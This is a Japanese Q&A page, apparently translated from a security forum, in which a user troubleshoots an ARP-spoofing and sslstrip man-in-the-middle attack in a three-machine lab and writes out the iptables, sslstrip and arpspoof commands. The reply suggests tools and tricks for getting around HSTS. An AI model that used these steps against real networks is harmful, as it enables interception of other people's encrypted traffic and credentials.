web-dev-qa-db-ja.com

sslstripがLANで機能しない

3台のマシンがスイッチに接続されたLANがあります。 2台のマシンがUbuntu 15.04を実行し、1台はApache SSLがインストールされ、ウェブサーバーとして機能します。 Ubuntuを実行している別のマシンがクライアントとして機能します。攻撃者のマシンはKali 2.0を実行しています。

すべてのマシンには手動でIPアドレスが割り当てられています。

 Client: 192.168.1.1 HW: 08:00:27:2a:ec:cc
 Server: 192.168.1.2 HW: 00:11:22:33:44:55
 Kali:   192.168.1.3 HW: 08:00:27:fa:25:8e

Kaliで次のコマンドを実行しました。

 echo 1 > /proc/sys/net/ipv4/ip_forward
 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

次に、sslstrip -k -l 8080を実行します。

次に、arpspoofを開始します。

 arpspoof -i eth0 -t 192.168.1.1 192.168.1.2
 arpspoof -i eth0 -t 192.168.1.2 192.168.1.1

クライアントとサーバーのarpテーブルはどちらもスプーフィングされており、Kaliマシンのハードウェアが含まれています。

私はWireshark Kaliも実行しています。 https://192.168.1.2/test.htmlを使用して、クライアントからサーバーからWebサイトにアクセスすると、Webサイトが表示されます。また、wiresharkでSSL/TLSハンドシェイクのすべてのパケットを確認できます。しかし、sslstripは何も表示しません!?

2
wasp256

この攻撃は古いWebブラウザでも機能します!しかし、現実には、現在ほとんどのサーバーでHSTS(HTTP Strict Transport Security)が有効になっています。

それで、HSTSが彼の仕事をしている場合でも、sslstripする方法は?

  1. 仮想マシンを使用する場合は、インターネットアダプターをブリッジモードで使用してください。
  2. Sslstrip2を使用するか、MANAやMITMFなどのMITMフレームワークを使用すると、より安定する傾向があります。
  3. ターゲットが例としてfacebook.comに到達して、ターゲットをsocial.facebook.comにリダイレクトしたい場合(HSTSセキュリティポリシーが証明書を記憶していなかった場合)、MITM SSLStripを実行できることを確認してください。
  4. パケットインジェクションもサポートする適切なWifiアダプターを使用してください。
1
Lucian Nitescu